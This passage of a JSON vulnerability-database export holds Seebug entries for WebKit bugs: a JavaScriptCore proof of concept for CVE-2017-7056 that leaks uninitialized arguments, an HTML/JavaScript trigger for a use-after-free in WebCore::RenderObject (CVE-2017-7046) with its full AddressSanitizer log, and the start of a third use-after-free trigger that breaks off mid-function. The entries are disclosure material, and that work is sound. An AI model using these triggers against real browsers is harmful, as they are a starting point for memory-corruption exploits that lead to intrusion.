storeArgumentCountIncludingThis(argumentCountIncludingThis);\r\n // store arguments\r\n ...\r\n }\r\n\r\n node->remove();\r\n node->origin.exitOK = canExit;\r\n break;\r\n }\r\n```\r\nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.\r\n\r\n### PoC:\r\n```\r\nconst kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform(CVE-2017-7056)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96301", "id": "SSV:96301", "sourceData": "\n const kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96301", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:44", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\n### PoC:\r\n\r\n=================================================================\r\n```\r\n<style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\r\n```\r\n=================================================================\r\n\r\n### ASan log:\r\n```\r\n=================================================================\r\n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58\r\nREAD of size 4 at 0x608000090ac8 thread T0\r\n==30692==WARNING: invalid path to external symbolizer!\r\n==30692==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)\r\n #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)\r\n #2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)\r\n #3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)\r\nfreed by thread T0 here:\r\n #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)\r\n #3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)\r\n #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)\r\n #5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)\r\n #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)\r\n #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)\r\n #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)\r\n #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)\r\n #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)\r\n #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)\r\n #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)\r\n #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)\r\n #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)\r\n #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const\r\nShadow bytes around the buggy address:\r\n 0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==30692==ABORTING\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: use-after-free in WebCore::RenderObject with accessibility enabled(CVE-2017-7046)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96309", "id": "SSV:96309", "sourceData": "\n <style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96309", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:47", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\n### PoC:\r\n\r\n=================================================================\r\n```\r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() 